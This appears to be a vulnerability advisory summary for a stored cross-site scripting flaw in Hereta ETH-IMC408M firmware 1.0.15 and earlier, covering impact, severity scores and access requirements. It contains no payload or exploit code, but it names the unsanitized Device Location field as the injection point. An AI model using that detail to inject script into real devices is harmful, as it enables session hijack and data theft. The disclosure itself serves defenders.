The vulnerability is a stored cross‑site scripting flaw (CWE‑79) in the Hereta ETH‑IMC408M firmware version 1.0.15 and earlier, allowing an authenticated attacker to inject arbitrary JavaScript by editing the Device Location field through the System Status interface. Because the input is not sanitized, the malicious script executes in the browsers of any user who views the status page, potentially enabling defacement, data exfiltration, or session hijack within the web portal.

Shenzhen Hereta Technology has issued this advisory for its ETH‑IMC408M wireless intrusion detection system. The flaw affects firmware versions 1.0.15 and older, exposing devices running these releases to the described injection.

The CVSS base score of 5.1 places the vulnerability in the medium severity range. Exploitability appears low, with an EPSS score below 1 percent, and the issue is not listed in CISA's KEV catalog. The flaw requires authentication to the device’s web interface, so an attacker must first obtain valid credentials or compromise the network the device resides on; once authenticated, injected scripts run automatically when the status page is accessed, limiting the risk to environments with exposed web interfaces and weak access controls.